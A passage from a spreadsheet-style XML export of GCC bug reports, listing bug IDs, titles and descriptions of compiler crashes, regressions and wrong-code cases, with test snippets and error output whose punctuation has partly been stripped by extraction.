[MacPro:~/badlinkdir] howarth% gfortran -r -nostdlib -o cns_solve-1007222053.exe array_reduced.o cns_reduced.o genic_reduced.o -DINTEGER='long int' -DCNS_ARCH_TYPE_LINUX -fdefault-integer-8 -O2 -fwhopr -fwhole-program -w
In file included from :0:0:
array_reduced.f: In function â€˜find52_.constprop.0â€™:
array_reduced.f:5:0: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
lto-wrapper: gfortran returned 1 exit status
collect2: lto-wrapper returned 1 exit status
The lto1 ICE doesn't occur if the optimization is reduced to -O1 or if the -fwhole-program flag is omitted.</t>
  </si>
  <si>
    <t>GCC-15871</t>
  </si>
  <si>
    <t>[3.4 Regression] g++ does not honour -fkeep-inline-functions</t>
  </si>
  <si>
    <t>Compiling  following:
inline void foo(void) {  }
produces this on g++ (3.4.1)
&gt; g++ -fkeep-inline-functions  -S -Wall  -O2 foo.C 
	.file	foo.C
g++ (3.5.0) also fails to emit the function.
on 3.3.3 the function was emitted as the doc's say it should be:
&gt; g++-3.3.3 -fkeep-inline-functions  -S -Wall  -O2 foo.C 
	.file	foo.C
	.section	.text$_Z3foovx
	.linkonce discard
	.align 2
	.p2align 415
.globl __Z3foov
	.def	__Z3foov	.scl	2	.type	32	.endef
__Z3foov:
	pushl	%ebp
	movl	%esp %ebp
	popl	%ebp
	ret
-fkeep-inline-functions does work as expected on 3.4.1 and 3.5.0 with C 
compiler.</t>
  </si>
  <si>
    <t>GCC-43067</t>
  </si>
  <si>
    <t>ICE: SIGSEGV with -fschedule-insns -mxop</t>
  </si>
  <si>
    <t>Command line:
gcc -O1 -ftree-vectorize -fschedule-insns -mxop -c testcase.c
Tested revisions:
r156745 - crash
r156693 - crash
r156293 - crash
r154830 - crash
r153685 - doesn't know -mxop
Output:
$ /mnt/svn/gcc-trunk/binary-156745-lto/bin/gcc -O1 -ftree-vectorize -fschedule-insns -mxop -c testcase.c
testcase.c: In function 'imul32_to_64':
testcase.c:12:1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Valgrind:
==16930== Invalid read of size 2
==16930==    at 0x73F912: memory_operand (recog.c:1300)
==16930==    by 0x9D953E: get_attr_memory (i386.md:18975)
==16930==    by 0x9897E7: ix86_adjust_cost (i386.c:19781)
==16930==    by 0xC0A20D: dep_cost_1 (haifa-sched.c:909)
==16930==    by 0xC0A599: priority (haifa-sched.c:1066)
==16930==    by 0xC0CFB8: set_priorities (haifa-sched.c:3311)
==16930==    by 0x77B269: compute_priorities (sched-rgn.c:2914)
==16930==    by 0x77CCB5: schedule_insns (sched-rgn.c:2943)
==16930==    by 0x77D26D: rest_of_handle_sched (sched-rgn.c:3512)
==16930==    by 0x7233EA: execute_one_pass (passes.c:1561)
==16930==    by 0x723674: execute_pass_list (passes.c:1616)
==16930==    by 0x723686: execute_pass_list (passes.c:1617)
==16930==  Address 0xabababababababab is not stack'd malloc'd or (recently) free'd</t>
  </si>
  <si>
    <t>GCC-8983</t>
  </si>
  <si>
    <t>Re: c++/8982: using foo::operator+ doesn't parse</t>
  </si>
  <si>
    <t xml:space="preserve"> dean@foster.net writes:
 | int main()
 | {
 |   using foo::bar    // works correctly
 |   using foo::operator-  // ** complains as syntax error
 This is a known bug -- there already duplicate reports for this and
 proposed patch.  And we'll have the new parser (soon).
 -- Gaby
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-3287</t>
  </si>
  <si>
    <t>usleep() undeclared</t>
  </si>
  <si>
    <t>The following code doesn't compile with g++ usleep.cc
#include 
int main (int ac char **av)
{ usleep (10) }
usleep.cc: In function `int main(int char**)':
usleep.cc:3: `usleep' undeclared (first use this function)
usleep.cc:5: (Each undeclared identifier is reported only once for each 
/usr/local/lib/gcc-lib/alpha-dec-osf4.0d/3.0/include/unistd.h  is used preprocessing and usleep() is not defined inside
Release:
gcc3.0
Environment:
Digital UNIX 4.0d</t>
  </si>
  <si>
    <t>f.bettoni</t>
  </si>
  <si>
    <t>GCC-67354</t>
  </si>
  <si>
    <t>[5 regression] internal compiler error: in add_to_same_comdat_group at symtab.c:421</t>
  </si>
  <si>
    <t>Created attachment 36255
preprocessor output
The attached preprocessed code generates an internal compiler error when compiled with the -Os option.  Tested with g++ 5.1 and 5.2.
Preprocessed file attached.
Here is the command line out output:
$ g++ -v -save-temps -std=gnu++11 -Wall -Wextra -Os -c -o gccbug.o gccbug.cpp 
Using built-in specs.
COLLECT_GCC=g++
Target: x86_64-unknown-linux-gnu
Configured with: /build/gcc-multilib/src/gcc-5.2.0/configure --prefix=/usr --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=https://bugs.archlinux.org/ --enable-languages=cc++adafortrangoltoobjcobj-c++ --enable-shared --enable-threads=posix --enable-libmpx --with-system-zlib --with-isl --enable-__cxa_atexit --disable-libunwind-exceptions --enable-clocale=gnu --disable-libstdcxx-pch --disable-libssp --enable-gnu-unique-object --enable-linker-build-id --enable-lto --enable-plugin --enable-install-libiberty --with-linker-hash-style=gnu --enable-gnu-indirect-function --enable-multilib --disable-werror --enable-checking=release --with-default-libstdcxx-abi=gcc4-compatible
Thread model: posix
gcc version 5.2.0 (GCC) 
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-std=gnu++11' '-Wall' '-Wextra' '-Os' '-c' '-o' 'gccbug.o' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/lib/gcc/x86_64-unknown-linux-gnu/5.2.0/cc1plus -E -quiet -v -D_GNU_SOURCE gccbug.cpp -mtune=generic -march=x86-64 -std=gnu++11 -Wall -Wextra -Os -fpch-preprocess -o gccbug.ii
ignoring nonexistent directory /usr/lib/gcc/x86_64-unknown-linux-gnu/5.2.0/../../../../x86_64-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc/x86_64-unknown-linux-gnu/5.2.0/../../../../include/c++/5.2.0
 /usr/lib/gcc/x86_64-unknown-linux-gnu/5.2.0/../../../../include/c++/5.2.0/x86_64-unknown-linux-gnu
 /usr/lib/gcc/x86_64-unknown-linux-gnu/5.2.0/../../../../include/c++/5.2.0/backward
 /usr/lib/gcc/x86_64-unknown-linux-gnu/5.2.0/include
 /usr/local/include
 /usr/lib/gcc/x86_64-unknown-linux-gnu/5.2.0/include-fixed
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-std=gnu++11' '-Wall' '-Wextra' '-Os' '-c' '-o' 'gccbug.o' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/lib/gcc/x86_64-unknown-linux-gnu/5.2.0/cc1plus -fpreprocessed gccbug.ii -quiet -dumpbase gccbug.cpp -mtune=generic -march=x86-64 -auxbase-strip gccbug.o -Os -Wall -Wextra -std=gnu++11 -version -o gccbug.s
GNU C++11 (GCC) version 5.2.0 (x86_64-unknown-linux-gnu)
	compiled by GNU C version 5.2.0 GMP version 6.0.0 MPFR version 3.1.3-p4 MPC version 1.0.3
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C++11 (GCC) version 5.2.0 (x86_64-unknown-linux-gnu)
	compiled by GNU C version 5.2.0 GMP version 6.0.0 MPFR version 3.1.3-p4 MPC version 1.0.3
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 18422b8e6e00646fd4f8fbf484d27148
gccbug.cpp: In instantiation of â€˜Test::Test(Args&amp;&amp; ...) [with Args = {}]â€™:
/usr/include/c++/5.2.0/ext/new_allocator.h:120:4:   required from â€˜void __gnu_cxx::new_allocator::construct(_Up* _Args _Args = {} _Tp = Test]â€™
/usr/include/c++/5.2.0/bits/alloc_traits.h:256:4:   required from â€˜static std::_Require::__construct_helper::type&gt; std::allocator_traits::_S_construct(_Alloc _Args = {} _Alloc = std::allocator std::_Require::__construct_helper::type&gt; = void]â€™
/usr/include/c++/5.2.0/bits/alloc_traits.h:402:16:   required from â€˜static decltype (_S_construct(__a __p (forward)(std::allocator_traits::construct::__args)...)) std::allocator_traits::construct(_Alloc _Args = {} _Alloc = std::allocator decltype (_S_construct(__a __p (forward)(std::allocator_traits::construct::__args)...)) = ]â€™
/usr/include/c++/5.2.0/bits/shared_ptr_base.h:522:39:   required from â€˜std::_Sp_counted_ptr_inplace::_Sp_counted_ptr_inplace(_Alloc _Args _Tp = Test _Alloc = std::allocator __gnu_cxx::_Lock_policy _Lp = (__gnu_cxx::_Lock_policy)2u]â€™
/usr/include/c++/5.2.0/bits/shared_ptr_base.h:617:4:   required from â€˜std::__shared_count::__shared_count(std::_Sp_make_shared_tag _Tp* const _Alloc _Alloc = std::allocator _Args = {} __gnu_cxx::_Lock_policy _Lp = (__gnu_cxx::_Lock_policy)2u]â€™
/usr/include/c++/5.2.0/bits/shared_ptr_base.h:1097:35:   required from â€˜std::__shared_ptr::__shared_ptr(std::_Sp_make_shared_tag const _Alloc _Args = {} _Tp = Test __gnu_cxx::_Lock_policy _Lp = (__gnu_cxx::_Lock_policy)2u]â€™
/usr/include/c++/5.2.0/bits/shared_ptr.h:319:64:   required from â€˜std::shared_ptr::shared_ptr(std::_Sp_make_shared_tag const _Alloc _Args = {} _Tp = Test]â€™
/usr/include/c++/5.2.0/bits/shared_ptr.h:614:39:   required from â€˜std::shared_ptr std::allocate_shared(const _Alloc _Alloc = std::allocator _Args = {}]â€™
/usr/include/c++/5.2.0/bits/shared_ptr.h:629:39:   required from â€˜std::shared_ptr std::make_shared(_Args _Args = {}]â€™
gccbug.cpp:13:33:   required from here
gccbug.cpp:10:2: internal compiler error: in add_to_same_comdat_group at symtab.c:421
  }
  ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>bgreen0</t>
  </si>
  <si>
    <t>GCC-59113</t>
  </si>
  <si>
    <t>[c++1y] ICE using auto as parameter in local function</t>
  </si>
  <si>
    <t>The following invalid code snippet (compiled with -std=c++1y) triggers an ICE on trunk:
=======================
void foo()
{
  void bar(auto) {}
}
auto i = 0
=======================
bug.cc: In function 'void foo()':
bug.cc:3:18: error: a function-definition is not allowed here before '{' token
   void bar(auto) {}
                  ^
bug.cc: At global scope:
bug.cc:6:6: error: 'template auto i' redeclared as different kind of symbol
 auto i = 0
      ^
bug.cc:6:6: note: previous declaration of 'auto i'
bug.cc:6:11: internal compiler error: in mangle_decl_string at cp/mangle.c:3426
 auto i = 0
           ^
0x712eff mangle_decl_string
        ../../gcc/gcc/cp/mangle.c:3426
0x713000 get_mangled_id
        ../../gcc/gcc/cp/mangle.c:3468
0x713000 mangle_decl(tree_node*)
        ../../gcc/gcc/cp/mangle.c:3491
0xd3c6d0 decl_assembler_name(tree_node*)
        ../../gcc/gcc/tree.c:587
0xb2e23e wrapup_global_declaration_2(tree_node*)
        ../../gcc/gcc/toplev.c:403
0xb2e39b wrapup_global_declarations(tree_node** int)
        ../../gcc/gcc/toplev.c:445
0x55e804 wrapup_globals_for_namespace(tree_node* void*)
        ../../gcc/gcc/cp/decl.c:882
0x55b7ec walk_namespaces_r
        ../../gcc/gcc/cp/decl.c:844
0x629884 cp_write_global_declarations()
        ../../gcc/gcc/cp/decl2.c:4303
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-2019</t>
  </si>
  <si>
    <t>Wrong line number warning listing the previous declaration of a befriended function</t>
  </si>
  <si>
    <t>The following code snippet:
namespace N {
  void foo(void)
}
void foo(int)
namespace N {
  class A {
  public:
    enum e { x }
    friend void N::foo(void)
    //friend void foo(e)
    friend void foo(void)       // line 13
  }
}
int main(void)
{
  return 0
}
Produces:
20010218.cc:13: warning: `void N::foo()' is already a friend of class `N::A'
20010218.cc:13: warning: previous friend declaration of `void N::foo()'
The latter should be line 11 not 13.
Release:
2.95 -&gt; 3.4
Environment:
irrelevant</t>
  </si>
  <si>
    <t>GCC-2248</t>
  </si>
  <si>
    <t>gcc 2.95.2 preprocessor bug with -O options</t>
  </si>
  <si>
    <t>preprocessor fails on this input file (bad.c):
#include 
void bad()
{
  if(( strcmp( mystr                
#if defined(SOMETHING)
	       yourstr) 
#else 
               ) 
#endif  
	!= 0 ) ) 
}
Release:
gcc-2.95.5
Environment:
Linux 2.2.12-20smp #1 SMP Mon Sep 27 10:34:45 EDT 1999 i686 unknown
How-To-Repeat:
gcc -O bad.c</t>
  </si>
  <si>
    <t>jdmorgen</t>
  </si>
  <si>
    <t>GCC-7265</t>
  </si>
  <si>
    <t>[ia64] HP-UX cross Linux compiler cannot build libgcc</t>
  </si>
  <si>
    <t>This code from a header included by libgcc2.c:
typedef struct {
        unsigned long fds_bits [(1024/(8 * sizeof(unsigned long)))]
} __kernel_fd_set
causes this message:
posix_types.h:37: size of array `fds_bits' is too large
replacing the number of elements in the array with a constant as small as 2 results in the same error.
Release:
xgcc (GCC) 3.1.1 20020708 (prerelease)
Environment:
HP-UX 11i cross-compiling for ia64-linux-linux-gnu
How-To-Repeat:
Make and install gcc 3.1.1 20020708 (prerelease) for HP-UX.  Use that compiler to build the cross-compiler for ia64-linux-linux-gnu.  The build will fail while compiling libgcc2.c to produce _muldi3.o with the message above.</t>
  </si>
  <si>
    <t>jnaset</t>
  </si>
  <si>
    <t>GCC-8158</t>
  </si>
  <si>
    <t>Compiler rejects legal default parameter</t>
  </si>
  <si>
    <t>The following code doesn't compile although it should.
#include 
class A
{
public:
typedef std::map TType
        //A(const TType&amp; x=TType()) // this works
        A( const std::map &amp; p_map = std::map() ) // this doesn't
        {
        }
}
int main(void )
{
        A a
        return 0
}
Release:
gcc 3.2 gcc 3.1
Environment:
Redhat 8.0 gcc 3.2 glibc 2.2.93
Redhat 7.2 gcc 3.1 glibc 2.2.4
How-To-Repeat:
Compile program from description.</t>
  </si>
  <si>
    <t>m.doppler</t>
  </si>
  <si>
    <t>GCC-45784</t>
  </si>
  <si>
    <t>gcc OpenMP - error: invalid controlling predicate</t>
  </si>
  <si>
    <t>The test is verifying that the parallel for loop construct may use
a variable of a pointer type in C.  
The OpenMP API Version 3.0 (May 2008) describes this usage on page
39 of the document.
Currently the GNU gcc compiler produces the following messages for
this test case:
ISU3417.c: In function 'vla_test':
ISU3417.c:23:25: error: invalid controlling predicate
The PGI Intel and Cray compilers compile this test case successfully.
$ cat ISU3417.c
//  derived from OpenMP test omp3c/c03_2_5_1_2c.c
#include 
#include 
#include 
#define NT 4
#define INCREMENT 2
#define ARRAY_SIZE INCREMENT*NT
// VLAs are standard only in C99 might as well use a C99-specific data type
// (long long int) while we're testing C99-specific features
void vla_test(int num_threads) {
    long long int *ptr vla[INCREMENT*num_threads]
    //long long int *ptr vla[INCREMENT*40]
    int i
    // variable-length array initialized to -1
    for (i = 0 i &lt; sizeof(vla)/sizeof(vla[0]) i++) {
        vla[i] = -1
    }
    #pragma omp parallel shared(vla)
    {
        #pragma omp for schedule(static 1)
        for (ptr = vla ptr &lt; vla + sizeof(vla)/sizeof(vla[0]) 
             ptr = ptr + INCREMENT)
             *ptr = omp_get_thread_num()
    }
    for (i = 0 i &lt; sizeof(vla)/sizeof(vla[0]) i++) {
        if (vla[i] != (i % INCREMENT == 0 ? (i/INCREMENT) % num_threads : -1)) {
            fprintf(stderr %s:%i: FAIL - vla[%i] == %lli != %i\n 
                    __FILE__ __LINE__ i vla[i] 
                   (i % INCREMENT == 0 ? (i/INCREMENT) % num_threads : -1))
            exit(1)
        }
    }
}
int main(void) {
    omp_set_dynamic(0)
    omp_set_num_threads(NT)
    vla_test(NT)
    return 0
}
$ gcc -c -fopenmp -std=c99 ISU3417.c
ISU3417.c: In function 'vla_test':
ISU3417.c:24:25: error: invalid controlling predicate
$
Other compilers working:
$ pgcc -mp -c ISU3417.c
$ icc -c -openmp ISU3417.c
$ cc -c -omp -V ISU3417.c
/opt/cray/xt-asyncpe/4.4.9/bin/cc: INFO: Compiling for compute nodes running CLE.
Cray C : Version 7.2.7 (u7267c72242i72182p72540a72002e60006z72540)
Cray C :               (x7205r72009w71001t7207)
Cray C : Fri Sep 24 2010  14:34:26
$</t>
  </si>
  <si>
    <t>geir</t>
  </si>
  <si>
    <t>GCC-35918</t>
  </si>
  <si>
    <t xml:space="preserve">Accepts invalid: INTERFACE  and REAL </t>
  </si>
  <si>
    <t>From the same thread as PR 35913. Found at
http://groups.google.com/group/comp.lang.fortran/browse_thread/thread/8bc064b25f12ed91
The following should be rejected:
implicit none
real foo
interface
  subroutine foo()
  end subroutine foo
end interface
end
Adding call foo() shows that the gfortran thinks that foo is a function. Similarly the following is invalid -- and it is detected as invalid:
implicit none
real foo
interface
  real function foo() ! Function 'foo' at (1) already has a type of REAL
  end function foo
end interface
end
while the following is essentially identical but the invalid code is not detected:
implicit none
real foo
interface
  function foo()
    real foo
  end function foo
end interface
end</t>
  </si>
  <si>
    <t>GCC-43281</t>
  </si>
  <si>
    <t>[c++0x] ICE with invalid auto</t>
  </si>
  <si>
    <t>it resembles Bug 41896 but with the addition of line: auto val = val
The code is legal but doesn't make any sense. In some rare cases which I couldn't replicate simply it went into an infinite mallo consuming the whole memory instead of segfault.
float nested_lambda()
{
        float val
        [val]()
        {
                auto val = val
                [val]()
                {
                }
        }
}
g++: Internal error: Segmentation Fault (program cc1plus)
Please submit a full bug report.
See  for instructions.
g++ -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/home/rakadam/streamplusplus/local/bin/../libexec/gcc/x86_64-unknown-linux-gnu/4.5.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --enable-languages=cc++ --program-suffix=-4.5 --prefix=/home/rakadam/streamplusplus/src/third_party/gcc-trunk/build_gcc/../../../../local --enable-lto --disable-bootstrap --enable-gold
Thread model: posix
gcc version 4.5.0 20100306 (experimental) (GCC)</t>
  </si>
  <si>
    <t>adam.rak</t>
  </si>
  <si>
    <t>GCC-8866</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] Bug in switch statement code generation -- missing label</t>
  </si>
  <si>
    <t>gcj is not emitting some important symbol when generating switch
statement code.  This is a fairly new regression. With the test code
below you'll see:
/tmp/ccGnYxUm.o(.text+0x24): undefined reference to `.L8'
Release:
3.3 20021207 (experimental)
Environment:
System: Linux park 2.4.18-18.8.0 #1 Thu Nov 14 00:10:29 EST 2002 i686 i686 i386 GNU/Linux
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /park/green/FSF/GCC/HEAD/gcc/configure --prefix=/park/green/latest/i --enable-languages=cc++java --enable-threads
How-To-Repeat:
$ gcj SwitchTest.java -O1  --main=SwitchTest
public class SwitchTest
{
  public static void main (String args[])
    {
      String attTypeString = 
      switch (args.length) {
      case 1:
          attTypeString = string
      case 4:
          attTypeString = ID
      case 5:
          attTypeString = IDREF
      case 6:
          attTypeString = NMTOKEN
      case 7:
          attTypeString = NOTATION
      default:
      }
    }
}</t>
  </si>
  <si>
    <t>GCC-60398</t>
  </si>
  <si>
    <t>[4.9 Regression] FAIL: obj-c++.dg/invalid-method-2.mm -fgnu-runtime  (test for errors line 10)</t>
  </si>
  <si>
    <t>Recent regression in obj-c++ testsuite [1]:
FAIL: obj-c++.dg/invalid-method-2.mm -fgnu-runtime  (test for errors line 10)
FAIL: obj-c++.dg/invalid-method-2.mm -fgnu-runtime  (test for errors line 14)
FAIL: obj-c++.dg/invalid-method-2.mm -fgnu-runtime (test for excess errors)
Compiler version: 4.9.0 20140228 (experimental) [trunk revision 208223] (GCC) 
[1] http://gcc.gnu.org/ml/gcc-testresults/2014-03/msg00166.html
The compiler generates different warnings:
output is:
/home/uros/gcc-svn/trunk/gcc/testsuite/obj-c++.dg/invalid-method-2.mm:10:4: error: 'x' does not name a type^M
/home/uros/gcc-svn/trunk/gcc/testsuite/obj-c++.dg/invalid-method-2.mm:14:18: error: 'x' does not name a type^M
while the testcase in both cases expects:
/* { dg-error expected } */</t>
  </si>
  <si>
    <t>GCC-28721</t>
  </si>
  <si>
    <t>SRA vs Ada and type mismatches</t>
  </si>
  <si>
    <t>I don't have time to create a smaller testcase right not but I am filing this so we don't lose track of it:
cc3605a.adb: In function Ã¢CC3605AÃ¢:
cc3605a.adb:8: error: statement types mismatch
D.1181_166 = SR.67D.1243_261
booleanD.472[(long intD.0) .P_BOUNDSD.755-&gt;LB0D.758:(long intD.0) .P_BOUNDSD.755-&gt;UB0D.759] *
voidD.487 *
cc3605a.adb:8: error: statement types mismatch
D.1185_170 = SR.68D.1244_251
struct cc3605a__arr_type___XUB *
voidD.487 *
cc3605a.adb:8: error: statement types mismatch
D.1189_176 = SR.70D.1246_269
struct cc3605a__arr_type___XUB *
voidD.487 *
cc3605a.adb:8: error: statement types mismatch</t>
  </si>
  <si>
    <t>GCC-78560</t>
  </si>
  <si>
    <t>powerpc64le ICE with -mcpu=power9</t>
  </si>
  <si>
    <t>The following test case:
int a b d
short *const c = (short *)
void e(void)
{
        d = 3
        for ( d &lt; 100 d++) {
                a = 0
                for ( a != 30 a = a + 5)
                        *c |= 4
        }
}
when built with:
gcc -O3 -mcpu=power9 testcase.c
fails with:
testcase.c: In function â€˜eâ€™:
testcase.c:13:1: error: unrecognizable insn:
 }
 ^
(insn 7 6 8 2 (set (reg:V8HI 166)
        (unspec:V8HI [
                (reg:V8HI 166)
                (mem/c:HI (reg/f:DI 167) [2 MEM[(short int *)&amp;b]+0 S2 A32])
                (const_int 0 [0])
            ] UNSPEC_VSX_SET)) -1
     (nil))
testcase.c:13:1: internal compiler error: in extract_insn at recog.c:2311
0x1086b173 _fatal_insn(char const* rtx_def const* char const* int char const*)
	../../gcc/gcc/rtl-error.c:108
0x1086b1d7 _fatal_insn_not_found(rtx_def const* char const* int char const*)
	../../gcc/gcc/rtl-error.c:116
0x1082f137 extract_insn(rtx_insn*)
	../../gcc/gcc/recog.c:2311
0x10564c5b instantiate_virtual_regs_in_insn
	../../gcc/gcc/function.c:1589
0x10564c5b instantiate_virtual_regs
	../../gcc/gcc/function.c:1956
0x10564c5b execute
	../../gcc/gcc/function.c:2005</t>
  </si>
  <si>
    <t>GCC-51290</t>
  </si>
  <si>
    <t>Bogus warning: zero as null pointer constant with static_cast</t>
  </si>
  <si>
    <t>Created attachment 25906
Testcase
When compiling the attached testcase:
gcc -std=gnu++11 -c -W -Wall -Wzero-as-null-pointer-constant testcase.cc -o testcase.o
gcc emits the following bogus warning:
testcase.cc: In static member function 'static void C::bar(B*)':
testcase.cc:16:38: warning: zero as null pointer constant [-Wzero-as-null-pointer-constant]</t>
  </si>
  <si>
    <t>us15</t>
  </si>
  <si>
    <t>GCC-51389</t>
  </si>
  <si>
    <t>GCC uses up to 75GB of virtual memory</t>
  </si>
  <si>
    <t>Created attachment 25971
test file to reproduce the problem
When compiling the attached file GCC uses up to 75GB of virtual memory which causes swapping and slows down the compilation a lot.
Command line:
/opt/local/bin/gcc-mp-4.7 -save-temps -Wno-unused -O3 -fno-math-errno -fschedule-insns2 -fno-trapping-math -fno-strict-aliasing -fwrapv -fmodulo-sched -freschedule-modulo-scheduled-loops -march=core2 -fomit-frame-pointer -fPIC -fno-common -mieee-fp   -I../include -c -o _t-c-2.o -I. -DHAVE_CONFIG_H _t-c-2.c -D___LIBRARY
System:
Darwin alexs 11.2.0 Darwin Kernel Version 11.2.0: Tue Aug  9 20:54:00 PDT 2011 root:xnu-1699.24.8~1/RELEASE_X86_64 x86_64 i386
GCC:
Using built-in specs.
COLLECT_GCC=/opt/local/bin/gcc-mp-4.7
COLLECT_LTO_WRAPPER=/opt/local/libexec/gcc/x86_64-apple-darwin11/4.7.0/lto-wrapper
Target: x86_64-apple-darwin11
Configured with: ../gcc-4.7-20111126/configure --prefix=/opt/local --build=x86_64-apple-darwin11 --enable-languages=cc++objcobj-c++ --libdir=/opt/local/lib/gcc47 --includedir=/opt/local/include/gcc47 --infodir=/opt/local/share/info --mandir=/opt/local/share/man --datarootdir=/opt/local/share/gcc-4.7 --with-local-prefix=/opt/local --with-system-zlib --disable-nls --program-suffix=-mp-4.7 --with-gxx-include-dir=/opt/local/include/gcc47/c++/ --with-gmp=/opt/local --with-mpfr=/opt/local --with-mpc=/opt/local --enable-stage1-checking --disable-multilib
Thread model: posix
gcc version 4.7.0 20111126 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-52793</t>
  </si>
  <si>
    <t>[4.8 Regression] 483.xalancbmk in SPEC CPU 2006 failed to build</t>
  </si>
  <si>
    <t>On Linux/x86-64 revision 185913 gave
g++ -c -o DOMNormalizer.o -DSPEC_CPU -DNDEBUG  -DAPP_NO_THREADS -DXALAN_INMEM_MSG_LOADER -I. -Ixercesc -Ixercesc/dom -Ixercesc/dom/impl -Ixercesc/sax -Ixercesc/util/MsgLoaders/InMemory -Ixercesc/util/Transcoders/Iconv -Ixalanc/include -DPROJ_XMLPARSER -DPROJ_XMLUTIL -DPROJ_PARSERS -DPROJ_SAX4C -DPROJ_SAX2 -DPROJ_DOM -DPROJ_VALIDATORS -DXML_USE_NATIVE_TRANSCODER -DXML_USE_INMEM_MESSAGELOADER -O3 -funroll-loops -ffast-math    -DSPEC_CPU_LP64  -DSPEC_CPU_LINUX     DOMNormalizer.cpp
...
DOMNormalizer.cpp:434:1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
specmake[3]: *** [DOMNormalizer.o] Error 1
Revision 185825 is OK.</t>
  </si>
  <si>
    <t>GCC-41587</t>
  </si>
  <si>
    <t>[OOP] ICE with ALLOCATABLE CLASS components</t>
  </si>
  <si>
    <t>type t0
  integer :: j = 42
end type t0
type t
  integer :: i
  class(t0) allocatable :: foo(3)
end type t
Is invalid. the foo(3) shall be foo(:) as foo is allocatable.</t>
  </si>
  <si>
    <t>GCC-51726</t>
  </si>
  <si>
    <t>LTO and attribute 'selectany'</t>
  </si>
  <si>
    <t>Created attachment 26213
Testcase
foobar.c: In function 'main':
foobar.c:1:32: error: 'bar':'selectany' attribute applies only to initialized objects</t>
  </si>
  <si>
    <t>GCC-46952</t>
  </si>
  <si>
    <t>[OOP] Spurious recursive call error with type bound procedure</t>
  </si>
  <si>
    <t>Created attachment 22759
Example that generate the error
The attached using a gfortran 4.6 from November 3 on i686-pc-mingw32 generates the error SUBROUTINE 'relay_proc' ... cannot be called recursively.  But I don't think the call is recursive - relay_proc is just the interface for what gets called not the actual procedure.
But Intel Fortran 12.0.1.127 also complains so maybe I'm wrong.</t>
  </si>
  <si>
    <t>GCC-6118</t>
  </si>
  <si>
    <t>ICE in resolve_offset_ref at cp/init.c:1873</t>
  </si>
  <si>
    <t>The attached testcase ICE's with 3.1 3.0.4 errors out on the same code so this is a regression.
Release:
GNU C++ version 3.1 20020329 (prerelease) (ppc-linux)
Environment:
binutils-2.11.93.0.2-9
glibc-2.2.5-27a_31
How-To-Repeat:
[fsirl@enzo:/cvsx/rawhide/BUILD/kvirc-3.0.0/src/kvirc/build]$ /usr/lib/gcc-lib/ppc-linux/3.1/cc1plus -fpreprocessed kvi_sp_tables.ii -quiet -dumpbase kvi_sp_tables.cpp -g -O2 -O0 -W -Wall -version -o kvi_sp_tables.s
GNU CPP version 3.1 20020329 (prerelease) (cpplib) (PowerPC GNU/Linux)
GNU C++ version 3.1 20020329 (prerelease) (ppc-linux)
        compiled by GNU C version 3.1 20020329 (prerelease).
In file included from ../sparser/kvi_sp_tables.cpp:24:
../sparser/kvi_sparser.h:142: warning: `class KviExternalServerDataParser' has
   virtual functions but non-virtual destructor
../sparser/kvi_sp_tables.cpp:30: Internal compiler error in resolve_offset_ref
   at cp/init.c:1873
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-77850</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/compat/scalar-by-value-4 c_compat_x_tst.o-c_compat_y_tst.o execute</t>
  </si>
  <si>
    <t>All the new _Complex char va tests fail on powerpc -m32.</t>
  </si>
  <si>
    <t>GCC-79737</t>
  </si>
  <si>
    <t>[7 Regression] wrong code at -O2 and -O3 on x86_64-linux-gnu (in both 32-bit and 64-bit modes)</t>
  </si>
  <si>
    <t>This appears to be a recent regression. 
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.1/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.1 20170227 (experimental) [trunk revision 245750] (GCC) 
$ 
$ gcc-trunk -Os small.c ./a.out
0
$ gcc-trunk -O2 small.c ./a.out
31
$ 
------------------------------------------
int printf (const char * ...) 
#pragma pack(1)
struct S
{
  int b:18
  int c:1
  int d:24
  int e:15
  int f:14
} i
int g j k
static struct S h
void fn1 ()
{
  for (j = 0 j &lt; 6 j++)
    k = 0
  for ( k &lt; 3 k++)
    {
      struct S m = { 5 0 -5 9 5 }
      h = m
      if (g)
        i = m
      h.e = 0
    }
}
int main ()
{
  fn1 ()
  printf (%d\n h.e)
  return 0 
}</t>
  </si>
  <si>
    <t>GCC-24389</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] template variable not getting marked as weak</t>
  </si>
  <si>
    <t>Creating two files:
==== t1.cpp ===
#include 
std::tr1::unordered_map map1
int main() {}
==== t2.cpp ====
#include 
std::tr1::unordered_map map
int t2(int i) { return 0 }
=============
compiling them with 
g++ -Wall t1.cpp t2.cpp
leads to compiler output:
t2.o:(.bss+0x20): multiple definition of `std::tr1::placeholders::(anonymous namespace)::_10'
